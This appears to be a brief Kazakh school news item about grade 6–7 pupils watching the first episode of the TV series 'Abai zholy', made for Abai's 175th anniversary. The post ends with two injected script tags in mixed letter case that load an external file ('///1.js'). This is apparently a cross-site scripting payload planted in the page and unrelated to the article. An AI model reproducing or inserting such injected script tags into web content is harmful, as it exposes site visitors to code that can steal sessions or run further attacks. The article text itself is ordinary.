№ 1 КОМ-нің 6-7 –сынып оқушылары назарына, сценарист Мұрат Есжанның «Абай жолы» телехикасы ұсынылды.Телехикая мақсаты - Абай Құнанбайұлының 175 жылдығына орай ақынның ұлт руханиятындағы орнын айшықтау және «Абай жолы» романында мықтап бейнеленген сом тұлғасын экран тілінде жас көрерменге таныстыру. Бірнеше бөлімнен тұратын кинотуындыда ұлы ойшыл, ағартушы, ақын Абайдың өскен ортасы, тағдыры, өмір сүрген кезеңі ғана көрсетіледі. Телехикаяның ерекшелігі — тараулардан тұруы. Сюжеттік желі үш кезеңде өтіп жатқан оқиғаларды қатар баяндау арқылы өрбиді. Телехикаяда екі ғасырдағы қоғам келбеті, қазақ халқының басынан өткен қилы кезеңдері көрсетіледі. Осы телехикаяның 1-бөлімін балалар қызығушылықпен тамашалады.Болашақта 20 жылдан астам жазған М.О.Әуезовтың «Абай жолы» романын алып, толық оқиды деген ой бар.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>